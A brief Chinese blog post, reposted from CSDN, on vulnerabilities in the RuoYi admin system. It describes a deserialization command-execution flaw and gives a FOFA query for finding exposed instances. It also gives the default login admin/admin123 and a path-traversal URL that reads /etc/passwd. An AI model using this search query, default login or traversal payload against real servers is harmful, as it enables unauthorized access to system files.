0


若依框架漏洞(若依管理系统漏洞)

若依管理系统是基于SpringBoot的权限管理系统,若依框架漏洞推荐使用zhzy的vulmap工具查看。

1.早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令

漏洞复现

祭出fofa大法,fofa语法如下

app="若依-管理系统" && body="admin"

利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap

利用poc执行任意命令

2后台登录若依管理系统后可以任意读取文件

登陆后访问 (默认弱口令 admin admin123)

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

读取 passwd


本文转载自: https://blog.csdn.net/yetaodiao/article/details/127160431
版权归原作者 yetaoseo 所有, 如有侵权,请联系我们删除。

“若依框架漏洞(若依管理系统漏洞)”的评论:

还没有评论